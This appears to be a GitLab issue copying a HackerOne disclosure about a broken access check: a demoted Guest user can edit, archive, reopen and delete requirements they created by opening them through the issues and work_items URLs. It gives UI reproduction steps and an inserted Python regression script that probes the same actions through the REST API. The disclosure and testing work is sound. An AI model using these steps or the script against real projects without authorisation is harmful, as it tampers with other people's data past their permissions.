Demoted Guest user can change Title, Description, Archive/Reopen and Delete Requirements via Issues
HackerOne report #2123430 by toukakirishima on 2023-08-25, assigned to @greg:
Report
Summary
I found an IDOR vulnerability when visiting the issues path; as an attacker I can change Title, Description, Archive/Reopen and Delete Requirements via Issues.
Normally you can't change Title, Description, Archive/Reopen and Delete Requirements with the Guest role, even if you created them.
And if you edit the title or description via GraphQL you will see a warning message ("The resource that you are attempting to access does not exist or you don't have permission to perform this action").
But as an attacker I can change Title, Description, Archive/Reopen and Delete Requirements with the Guest role.
According to the following article, a member must have at least the Reporter role to edit a requirement: "You must have at least the Reporter role."
According to the following article, a member must have at least the Reporter role to archive a requirement: "You must have at least the Reporter role."
According to the following article, a member must have at least the Reporter role to reopen a requirement: "You must have at least the Reporter role."
And there is no documentation on whether a requirement can be removed.
NOTE
This vulnerability only applies when the attacker created the requirements (before the attacker was demoted to the Guest role).
Let's say Touka Attacker (Reporter role) is the attacker and Touka Kirishima is the victim.
Touka Attacker (attacker) creates a requirement and is then demoted to the Guest role.
Steps to reproduce
- Go to Requirements, choose one that you have made, and copy the ID. Example ID: 16
- Go to the Issues URL and paste the ID. Example: https://gitlab.com/toukak2/zzzz/-/issues/16
- Edit, then save the change; you have now successfully edited the title and description and archived/reopened the Requirement.
- To remove the Requirement, change the URL to work_items. Example: https://gitlab.com/toukak2/zzzz/-/work_items/16
- Delete the Requirement; you have now successfully deleted it.
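A regression check for the steps above, added here as an example; it is not part of the HackerOne report and not GitLab's own code. The report reproduces the bug through the web UI only, so it is an assumption (stated in the code) that the REST Issues API `PUT/DELETE /api/v4/projects/:id/issues/:iid` exercises the same authorization path. The values `GITLAB_URL`, `PROJECT`, `IID` and `TOKEN` are placeholders for the target instance, the URL-encoded project path, the requirement's iid and the demoted Guest user's personal access token. A 2xx response to any probe means the Guest user was allowed to perform the action and the bug is still present; 403 (or GitLab's 404 for hidden resources) means it was correctly denied. The delete probe is destructive and therefore opt-in.

```python
"""
Regression check for the access-path bypass in the report above.

Added example, not the reporter's or GitLab's code. Assumptions not stated
on the page:
  - the REST Issues API goes through the same authorization path as the
    web UI used in the report (the report reproduces via the UI only);
  - GITLAB_URL, PROJECT (URL-encoded path), IID and TOKEN are placeholders
    for the target instance, project, requirement iid and the demoted Guest
    user's personal access token (api scope).
"""
import json
import urllib.error
import urllib.parse
import urllib.request

# Probes in the order the report exercises them: edit, archive (close),
# reopen. Delete is destructive, so it is only added when asked for.
PROBES = [
    ("edit title",       "PUT", {"title": "title changed by guest"}),
    ("edit description", "PUT", {"description": "description changed by guest"}),
    ("archive (close)",  "PUT", {"state_event": "close"}),
    ("reopen",           "PUT", {"state_event": "reopen"}),
]
DELETE_PROBE = ("delete", "DELETE", None)


def build_request(base_url, project, iid, method, payload, token):
    """Build the request for PUT/DELETE /api/v4/projects/:id/issues/:iid."""
    url = (f"{base_url.rstrip('/')}/api/v4/projects/"
           f"{urllib.parse.quote(str(project), safe='')}/issues/{iid}")
    data = json.dumps(payload).encode() if payload is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("PRIVATE-TOKEN", token)
    if data is not None:
        req.add_header("Content-Type", "application/json")
    return req


def send(req):
    """Default transport: return the HTTP status, treating 4xx/5xx as a status."""
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def classify(status):
    """Map an HTTP status onto the outcome the check cares about."""
    if 200 <= status < 300:
        return "ALLOWED (bug present)"
    if status in (401, 403):
        return "denied"
    if status == 404:
        # GitLab answers 404 for resources the caller may not access.
        return "not found (hidden resource; treat as denied)"
    return f"unexpected HTTP {status}"


def run_checks(base_url, project, iid, token, include_delete=False, transport=send):
    """Run every probe as the Guest user; return {probe name: outcome}."""
    probes = PROBES + ([DELETE_PROBE] if include_delete else [])
    results = {}
    for name, method, payload in probes:
        status = transport(build_request(base_url, project, iid, method, payload, token))
        results[name] = classify(status)
    return results


if __name__ == "__main__":
    import os
    import sys
    outcome = run_checks(
        os.environ.get("GITLAB_URL", "https://gitlab.example.com"),  # placeholder
        os.environ.get("PROJECT", "group/project"),                  # placeholder
        os.environ.get("IID", "16"),                                 # iid from the report's example
        os.environ["TOKEN"],                                         # Guest user's token
        include_delete=os.environ.get("INCLUDE_DELETE") == "1",
    )
    for name, result in outcome.items():
        print(f"{name:18s} {result}")
    sys.exit(1 if any(r.startswith("ALLOWED") for r in outcome.values()) else 0)
```

Run it as the demoted Guest user against a requirement that user created; the exit status is non-zero if any probe was allowed, which makes it usable as a post-fix regression test. Because the report notes that the GraphQL path already refuses the edit, a "denied" result from the API does not by itself prove the UI path is fixed; re-run the UI steps above as well.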
POC
bandicam_2023-08-25_20-14-33-409.mp4
Output of checks
This bug happens on GitLab.com
Impact
The attacker can still change Title, Description, Archive/Reopen and Delete Requirements via Issues even though the attacker has been demoted to the Guest role.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- bandicam_2023-08-25_20-14-33-409.mp4
- image.png
How To Reproduce
Please add reproducibility information to this section: